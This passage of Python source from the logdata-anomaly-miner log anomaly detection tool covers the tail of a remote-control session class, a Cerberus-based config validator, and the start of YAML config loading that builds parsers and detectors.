self.terminate() def do_send(self): """Send data from the output buffer to the remote side. @return True if output buffer was emptied. """ send_length = os.write(self.remote_control_fd, self.output_buffer) if send_length == len(self.output_buffer): self.output_buffer = b'' return True self.output_buffer = self.output_buffer[send_length:] return False def put_request(self, request_type, request_data): """Add a request of given type to the send queue. @param request_type is a byte string denoting the type of the request. Currently only 'EEEE' is supported. @param request_data is a byte string denoting the content of the request. """ if not isinstance(request_type, bytes): msg = 'Request type is not a byte string' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if len(request_type) != 4: msg = 'Request type has to be 4 bytes long' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(request_data, bytes): msg = 'Request data is not a byte string' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if len(request_data) + 8 > self.max_control_packet_size: msg = 'Data too large to fit into single packet' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.output_buffer += struct.pack("!I", len(request_data) + 8) + request_type + request_data def put_execute_request(self, remote_control_code, remote_control_data): """Add a request to send exception data to the send queue.""" remote_control_data = json.dumps([JsonUtil.encode_object(remote_control_code), JsonUtil.encode_object(remote_control_data)]) self.put_request(b'EEEE', remote_control_data.encode()) def add_select_fds(self, input_select_fd_list, output_select_fd_list): """Update the file descriptor lists for selecting on read and write file descriptors.""" if self.output_buffer: output_select_fd_list.append(self.remote_control_fd) else: input_select_fd_list.append(self.remote_control_fd) def terminate(self): """End this remote control session.""" self.control_client_socket.close() # Avoid accidential reuse. self.control_client_socket = None self.remote_control_fd = -1 if self.input_buffer or self.output_buffer: msg = 'Unhandled input data' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def is_dead(self): """Check if this remote control connection is already dead.""" return self.remote_control_fd == -1 logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/ConfigValidator.py000066400000000000000000000215311500476301700326320ustar00rootroot00000000000000import sys import os import logging import ast from cerberus import Validator, TypeDefinition class ParserModelType: """Defines a type for parser classes.""" name = None is_model = False func = None def __init__(self, name): self.name = name if name.endswith("ModelElement"): self.is_model = True # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.parsing" if name == "DebugMatchContext": module += ".MatchContext" if name == "MultiLocaleDateTimeModelElement": module += ".DateTimeModelElement" else: module += "." + name self.func = getattr(__import__(module, fromlist=[name]), name) else: self.is_model = False try: self.func = __import__(name).get_model except (AttributeError, ImportError) as e: ymlext = ['.yml', '.YAML', '.YML', '.yaml'] module = None for path in sys.path: for extension in ymlext: abs_path = os.path.join(path, name + extension) if os.path.exists(abs_path): module = abs_path break if module is not None: import yaml import copy from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.YamlConfig import filter_config_errors, build_parsing_model with open(module) as yamlfile: try: yaml_data = yaml.safe_load(yamlfile) except yaml.YAMLError as exception: logging.getLogger(DEBUG_LOG_NAME).error(exception) raise exception with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma: parser_normalisation_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma: parser_validation_schema = ast.literal_eval(sma.read()) normalisation_schema = {**parser_normalisation_schema} validation_schema = {**parser_validation_schema} v = ConfigValidator(validation_schema) if not v.validate(yaml_data, validation_schema): filtered_errors = copy.deepcopy(v.errors) filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema) v = NormalisationValidator(normalisation_schema) if v.validate(yaml_data, normalisation_schema): test = v.normalized(yaml_data) yaml_data = test else: logging.getLogger(DEBUG_LOG_NAME).error(v.errors) raise ValueError(v.errors) self.func, _ = build_parsing_model(yaml_data) if callable(self.func): self.func = self.func() else: raise e def __str__(self): return self.name class AnalysisType: """Defines a type for analysis classes.""" name = None func = None def __init__(self, name): self.name = name # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.analysis" if name in ("MatchPathFilter", "MatchValueFilter", "SubhandlerFilter"): module += ".AtomFilters" elif name in ("LinearNumericBinDefinition", "ModuloTimeBinDefinition", "PathDependentHistogramAnalysis", "BinDefinition", "HistogramData"): module += ".HistogramAnalysis" elif name == "MissingMatchPathListValueDetector": module += ".MissingMatchPathValueDetector" elif name in ("AndMatchRule", "OrMatchRule", "AtomFilterMatchAction", "DebugHistoryMatchRule", "EventGenerationMatchAction", "DebugMatchRule", "IPv4InRFC1918MatchRule", "ModuloTimeMatchRule", "NegationMatchRule", "ParallelMatchRule", "PathExistsMatchRule", "StringRegexMatchRule", "ValueDependentDelegatedMatchRule", "ValueDependentModuloTimeMatchRule", "ValueListMatchRule", "ValueMatchRule", "ValueRangeMatchRule"): module += ".Rules" elif name in ("TimeCorrelationDetector", "CorrelationFeature"): module += ".TimeCorrelationDetector" elif name in ("TimeCorrelationViolationDetector", "CorrelationRule", "EventClassSelector"): module += ".TimeCorrelationViolationDetector" elif name == "SimpleMonotonicTimestampAdjust": module += ".TimestampCorrectionFilters" elif name in ("SimpleUnparsedAtomHandler", "VerboseUnparsedAtomHandler"): module += ".UnparsedAtomHandlers" else: module += "." + name self.func = getattr(__import__(module, fromlist=[name]), name) def __str__(self): return self.name class EventHandlerType: """Defines a type for event classes.""" name = None func = None def __init__(self, name): self.name = name # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.events" if name in ("EventHandlerInterface", "EventSourceInterface"): module += ".EventInterfaces" elif name == "VolatileLogarithmicBackoffEventHistory": module += ".Utils" else: module += "." + name self.func = getattr(__import__(module, fromlist=[name]), name) def __str__(self): return self.name parser_type = TypeDefinition("parsermodel", (ParserModelType, str), ()) analysis_type = TypeDefinition("analysistype", (AnalysisType, str), ()) event_handler_type = TypeDefinition("eventhandlertype", (EventHandlerType, str), ()) class ConfigValidator(Validator): """Validates values from the configs.""" def _validate_has_start(self, has_start, field, value): """Test if there is a key named "has_start". The rule's arguments are validated against this schema: {'type': 'boolean'} """ seen_start = False for var in value: if "start" in var and var["start"] is True: if seen_start: self._error(field, 'Only one parser with "start"-key is allowed') seen_start = True if has_start and not seen_start: self._error(field, 'Parser must contain a "start"-key') def _validate_bigger_than_or_equal(self, bigger_than_or_equal, field, value): """ Check if the value of the current attribute is bigger than the value of bigger_than. This check works for integers and floats. Usage: {"bigger_than_or_equal": ["lower_value_attribute", default_value_if_not_defined]} For example: "max_num_vals": {"type": "integer", "bigger_than_or_equal": ["min_num_vals", 1000]} The rule's arguments are validated against this schema: {'type': 'list'} """ key, default_value = bigger_than_or_equal if key not in self.document: lower_value = default_value else: lower_value = self.document[key] if value < lower_value: self._error(field, f"{field}(={str(value)}) must be bigger than or equal with {key}(={str(self.document[key])}).") class NormalisationValidator(ConfigValidator): """Normalises values from the configs.""" types_mapping = Validator.types_mapping.copy() types_mapping["parsermodel"] = parser_type types_mapping["analysistype"] = analysis_type types_mapping["eventhandlertype"] = event_handler_type def _normalize_coerce_toparsermodel(self, value): """Create a ParserModelType from the string representation.""" if isinstance(value, str): return ParserModelType(value) return None def _normalize_coerce_toanalysistype(self, value): """Create a AnalysisType from the string representation.""" if isinstance(value, str): return AnalysisType(value) return None def _normalize_coerce_toeventhandlertype(self, value): """Create a EventHandlerType from the string representation.""" if isinstance(value, str): return EventHandlerType(value) return None logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py000066400000000000000000002305301500476301700316100ustar00rootroot00000000000000"""This file loads and parses a config-file in yaml format. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging import copy import ast import pytz from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util.StringUtil import decode_string_as_byte_string config_properties = {} yaml_data = None enhanced_new_match_path_value_combo_detector_reference = None def load_yaml(config_file): """Load the yaml configuration from files. Basically there are two schema types: validation schemas and normalisation schemas. The validation schemas validate together with the BaseSchema all inputs as specifically as possible. Due to the limitations of oneof_schemas and the not functional normalisation in the validation schemas, the normalisation schemas are used to set default values and convert the date in right data types with coerce procedures. """ # We might be able to remove this and us it like the config_properties global yaml_data import yaml from aminer.ConfigValidator import ConfigValidator, NormalisationValidator import os with open(config_file) as yamlfile: try: yaml_data = yaml.safe_load(yamlfile) yamlfile.close() except yaml.YAMLError as exception: logging.getLogger(DEBUG_LOG_NAME).error(exception) raise exception with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/BaseSchema.py', 'r') as sma: base_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma: parser_normalisation_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/AnalysisNormalisationSchema.py', 'r') as sma: analysis_normalisation_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/EventHandlerNormalisationSchema.py', 'r') as sma: event_handler_normalisation_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma: parser_validation_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/AnalysisValidationSchema.py', 'r') as sma: analysis_validation_schema = ast.literal_eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/EventHandlerValidationSchema.py', 'r') as sma: event_handler_validation_schema = ast.literal_eval(sma.read()) normalisation_schema = { **base_schema, **parser_normalisation_schema, **analysis_normalisation_schema, **event_handler_normalisation_schema} validation_schema = {**base_schema, **parser_validation_schema, **analysis_validation_schema, **event_handler_validation_schema} v = ConfigValidator(validation_schema) if not v.validate(yaml_data, validation_schema): filtered_errors = copy.deepcopy(v.errors) filter_config_errors(filtered_errors, 'Analysis', v.errors, analysis_validation_schema) filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema) filter_config_errors(filtered_errors, 'EventHandlers', v.errors, event_handler_validation_schema) raise ValueError(f'Config-Error: {filtered_errors}') v = NormalisationValidator(normalisation_schema) if v.validate(yaml_data, normalisation_schema): test = v.normalized(yaml_data) yaml_data = test else: logging.getLogger(DEBUG_LOG_NAME).error(v.errors) raise ValueError(v.errors) # Set default values for key, val in yaml_data.items(): config_properties[str(key)] = val def filter_config_errors(filtered_errors, key_name, errors, schema): """Filter oneof outputs to produce a clear overview of the error.""" oneof = schema[key_name]['schema']['oneof'] if key_name in errors: for i, err in enumerate(errors[key_name]): if isinstance(err, str): err = {0: err} for key in err: if 'none or more than one rule validate' in err[key]: for cause in err[key]: if isinstance(cause, dict): # we need to copy the dictionary as it is not possible to iterate through it and change the size. last_error = None for definition in copy.deepcopy(cause): if 'type' in cause[definition][0] and cause[definition][0]['type'][0].startswith('unallowed value '): last_error = cause[definition][0]['type'][0] del cause[definition] else: oneof_def_pos = int(definition.split(' ')[-1]) oneof_schema_type = oneof[oneof_def_pos]['schema']['type'] if 'forbidden' in oneof_schema_type: cause[definition][0]['type'] = {'forbidden': oneof_schema_type['forbidden']} elif 'allowed' in oneof_schema_type: cause[definition][0]['type'] = {'allowed': oneof_schema_type['allowed']} if len(cause) == 0 and last_error is not None: cause[key_name + ' error'] = last_error filtered_errors[key_name][i] = err # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ parsing_model, parser_model_dict = build_parsing_model() anomaly_event_handlers, atom_filter = build_input_pipeline(analysis_context, parsing_model, parser_model_dict) event_handler_id_list = build_event_handlers(analysis_context, anomaly_event_handlers) build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model) # do not check UnparsedAtomHandler for index, analysis_component in enumerate(atom_filter.subhandler_list[1:]): if analysis_component[0].output_event_handlers is not None: event_handlers = [] for i in analysis_component[0].output_event_handlers: event_handlers.append(anomaly_event_handlers[event_handler_id_list.index(i)]) atom_filter.subhandler_list[index+1][0].output_event_handlers = event_handlers def build_parsing_model(data=None): """Build the parsing model.""" parser_model_dict = {} start = None ws_count = 0 if data is None: data = yaml_data for item in data['Parser']: if item['id'] in parser_model_dict: raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in Parser!') if 'start' in item and item['start'] is True and item['type'].name not in ['JsonModelElement', 'JsonStringModelElement', 'XmlModelElement']: start = item if item['type'].is_model: if 'args' in item: if isinstance(item['args'], list): for i, value in enumerate(item["args"]): if (isinstance(value, str) and value == "WHITESPACE") or (isinstance(value, bytes) and value == b"WHITESPACE"): from aminer.parsing.FixedDataModelElement import FixedDataModelElement sp = f'sp{int(ws_count)}' item["args"][i] = FixedDataModelElement(sp, b' ') ws_count += 1 if item['type'].name not in ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement'): # encode string to bytearray for j, val in enumerate(item['args']): if isinstance(val, str): item['args'][j] = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r"). \ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") else: if item['type'].name not in ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement') and \ isinstance(item['args'], str): item['args'] = item['args'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") if item['type'].name == 'ElementValueBranchModelElement': value_model = parser_model_dict.get(item['args'][0].decode()) if value_model is None: msg = f'The parser model {item["args"][0].decode()} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) branch_model_dict = {} for i in item['branch_model_dict']: key = i['id'] model = i['model'] if parser_model_dict.get(model) is None: msg = f'The parser model {key} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) branch_model_dict[key] = parser_model_dict.get(model) parser_model_dict[item['id']] = item['type'].func(item['name'], value_model, item['args'][1].decode(), branch_model_dict) elif item['type'].name == 'DateTimeModelElement': time_zone = item['time_zone'] if time_zone is not None: time_zone = pytz.timezone(time_zone) parser_model_dict[item['id']] = item['type'].func( item['name'], item['date_format'].encode(), time_zone, item['text_locale'], item['start_year'], item['max_time_jump_seconds']) elif item['type'].name == 'MultiLocaleDateTimeModelElement': date_formats = [] for date_format in item['date_formats']: if len(date_format['format']) != 3: msg = 'The date_format must have a size of 3!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) fmt = date_format['format'] fmt[0] = fmt[0].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").\ replace(b"\\b", b"\b") date_formats.append(tuple(fmt)) parser_model_dict[item['id']] = item['type'].func( item['name'], date_formats, item['start_year'], item['max_time_jump_seconds']) elif item['type'].name == 'RepeatedElementDataModelElement': model = item['args'][0].decode() if parser_model_dict.get(model) is None: msg = f'The parser model {model} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) item['args'][0] = parser_model_dict.get(model) parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0]) if len(item['args']) == 2: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0], item['args'][1]) elif len(item['args']) == 3: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0], item['args'][1], item['args'][2]) elif len(item['args']) > 3: msg = 'The RepeatedElementDataModelElement does not have more than 3 arguments.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) elif item['type'].name == 'DecimalFloatValueModelElement': parser_model_dict[item['id']] = item['type'].func( item['name'], item['value_sign_type'], item['value_pad_type'], item['exponent_type']) elif item['type'].name == 'DecimalIntegerValueModelElement': parser_model_dict[item['id']] = item['type'].func(item['name'], item['value_sign_type'], item['value_pad_type']) elif item['type'].name in ('FirstMatchModelElement', 'SequenceModelElement'): children = [] if not isinstance(item['args'], list): msg = f'"args" has to be a list when using the {item["type"].name}. Currently args is defined as {repr(item["args"])}' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for child in item['args']: if isinstance(child, bytes): child = child.decode() if isinstance(child, str): if parser_model_dict.get(child) is None: msg = f'The parser model {child} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) children.append(parser_model_dict.get(child)) else: children.append(child) parser_model_dict[item['id']] = item['type'].func(item['name'], children) elif item['type'].name == 'OptionalMatchModelElement': optional_element = parser_model_dict.get(item['args'].decode()) if optional_element is None: msg = f'The parser model {item["args"].decode()} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parser_model_dict[item['id']] = item['type'].func(item['name'], optional_element) elif item['type'].name == 'DelimitedDataModelElement': delimiter = item['delimiter'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") parser_model_dict[item['id']] = item['type'].func(item['name'], delimiter, item['escape'], item['consume_delimiter']) elif item['type'].name == 'JsonModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func( item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields']) else: parser_model_dict[item['id']] = item['type'].func( item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields']) elif item['type'].name == 'XmlModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func( item['name'], key_parser_dict, item['attribute_prefix'], item['optional_attribute_prefix'], item['empty_allowed_prefix'], item['xml_header_expected']) else: parser_model_dict[item['id']] = item['type'].func( item['name'], key_parser_dict, item['attribute_prefix'], item['optional_attribute_prefix'], item['empty_allowed_prefix'], item['xml_header_expected']) elif item['type'].name == 'JsonStringModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func(item['name'], key_parser_dict, item['strict'], item['ignore_null']) else: parser_model_dict[item['id']] = item['type'].func(item['name'], key_parser_dict, item['strict'], item['ignore_null']) else: if 'args' in item: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args']) else: parser_model_dict[item['id']] = item['type'].func(item['name']) else: if callable(item['type']): parser_model_dict[item['id']] = item['type'].func() else: parser_model_dict[item['id']] = item['type'].func while callable(parser_model_dict[item['id']]): parser_model_dict[item['id']] = parser_model_dict[item['id']]() if start.__class__.__name__ in ['JsonModelElement', 'JsonStringModelElement', 'XmlModelElement']: parsing_model = start else: parsing_model = parser_model_dict[start['id']] return parsing_model, parser_model_dict def build_input_pipeline(analysis_context, parsing_model, parser_model_dict): """Build the input pipeline.""" # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) analysis_context.register_component(atom_filter, component_name="AtomFilter") anomaly_event_handlers = [] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory timestamp_paths = yaml_data['Input']['timestamp_paths'] if isinstance(timestamp_paths, str): timestamp_paths = [timestamp_paths] use_real_time = yaml_data['Input']['use_real_time'] continuous_timestamp_missing_warning = yaml_data['Input']['continuous_timestamp_missing_warning'] sync_wait_time = yaml_data['Input']['sync_wait_time'] eol_sep = yaml_data['Input']['eol_sep'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") json_format = yaml_data['Input']['json_format'] xml_format = yaml_data['Input']['xml_format'] if yaml_data['Input']['multi_source'] is True: from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync if yaml_data['Input']['adjust_timestamps'] is True: from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust atom_handler_list = [SimpleMultisourceAtomSync([SimpleMonotonicTimestampAdjust([atom_filter])], sync_wait_time=sync_wait_time)] else: atom_handler_list = [SimpleMultisourceAtomSync([atom_filter], sync_wait_time=sync_wait_time)] else: if yaml_data['Input']['adjust_timestamps'] is True: from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust atom_handler_list = [SimpleMonotonicTimestampAdjust([atom_filter])] else: atom_handler_list = [atom_filter] log_resources = {} for resource in yaml_data['LogResourceList']: obj = {} if isinstance(resource, str): obj["url"] = decode_string_as_byte_string(resource) elif isinstance(resource, dict): obj = resource if "json" in obj and "xml" in obj: msg = "Log resources can not be in the json and xml format at the same time." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if "json" not in obj: obj["json"] = None if "xml" not in obj: obj["xml"] = None if "parser_id" not in obj: obj["parser_id"] = None if isinstance(obj["url"], str): obj["url"] = decode_string_as_byte_string(obj["url"]) log_resources[obj["url"]] = obj analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, atom_handler_list, anomaly_event_handlers, default_timestamp_path_list=timestamp_paths, eol_sep=eol_sep, json_format=json_format, xml_format=xml_format, parser_model_dict=parser_model_dict, log_resources=log_resources, use_real_time=use_real_time, continuous_timestamp_missing_warning=continuous_timestamp_missing_warning) return anomaly_event_handlers, atom_filter def build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model): """Build the analysis components.""" suppress_detector_list = analysis_context.suppress_detector_list has_unparsed_handler = False has_new_match_path_handler = False if 'Analysis' in yaml_data and yaml_data['Analysis'] is not None: analysis_dict = {} match_action_dict = {} match_rules_dict = {} correlation_rules = {} # changed order if ETD is defined. for item in yaml_data['Analysis']: if item['type'].name == 'EventTypeDetector': index = yaml_data['Analysis'].index(item) new_analysis_list = [item] del yaml_data['Analysis'][index] new_analysis_list += yaml_data['Analysis'] yaml_data['Analysis'] = new_analysis_list break for item in yaml_data['Analysis']: if item['type'].name in ('SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'): has_unparsed_handler = True # make room for the UnparsedAtomHandler. atom_filter.add_handler(None, True) break for item in yaml_data['Analysis']: if item['type'].name == 'NewMatchPathDetector': has_new_match_path_handler = True break has_new_match_path_handler, has_unparsed_handler = add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) for item in yaml_data['Analysis']: stop_when_handled_flag = False if item['id'] == 'None': comp_name = None else: comp_name = item['id'] if analysis_context.get_component_by_name(comp_name) is not None: raise ValueError(f'Config-Error: The id "{comp_name}" occurred multiple times in Analysis!') if 'learn_mode' in item: learn = item['learn_mode'] else: if 'LearnMode' not in yaml_data: msg = 'Config-Error: LearnMode must be defined if an analysis component does not define learn_mode.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) learn = yaml_data['LearnMode'] func = item['type'].func if item['suppress']: if comp_name is None: raise ValueError(f'Config-Error: id must be specified for the analysis component {item["type"]} to enable suppression.') suppress_detector_list.append(comp_name) if item['type'].name == 'NewMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MatchPathFilter': parsed_atom_handler_lookup_list = [] for atom_handler in item['parsed_atom_handler_lookup_list']: if atom_handler[1] is not None: if analysis_context.get_component_by_name(atom_handler[1]) is None: msg = f'The atom handler {atom_handler[1]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) atom_handler[1] = analysis_context.get_component_by_name(atom_handler[1]) parsed_atom_handler_lookup_list.append(tuple(i for i in atom_handler)) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'MatchValueFilter': parsed_atom_handler_dict = {} for atom_handler in item['parsed_atom_handler_dict']: if analysis_context.get_component_by_name(atom_handler) is None: msg = f'The atom handler {atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parsed_atom_handler_dict[atom_handler] = analysis_context.get_component_by_name(atom_handler) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(item['path'], parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'PCADetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], window_size=item['window_size'], min_anomaly_score=item['min_anomaly_score'], min_variance=item['min_variance'], num_windows=item['num_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'NewMatchPathValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MissingMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MissingMatchPathListValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['path'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EventSequenceDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], seq_len=item['seq_len'], learn_mode=learn, timeout=item['timeout'], allow_missing_id=item['allow_missing_id'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'ValueRangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'CharsetDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EntropyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], prob_thresh=item['prob_thresh'], default_freqs=item['default_freqs'], skip_repetitions=item['skip_repetitions'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], unique_path_list=item['unique_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], empty_window_warnings=item['empty_window_warnings'], early_exceeding_anomaly_output=item['early_exceeding_anomaly_output'], set_lower_limit=item['set_lower_limit'], 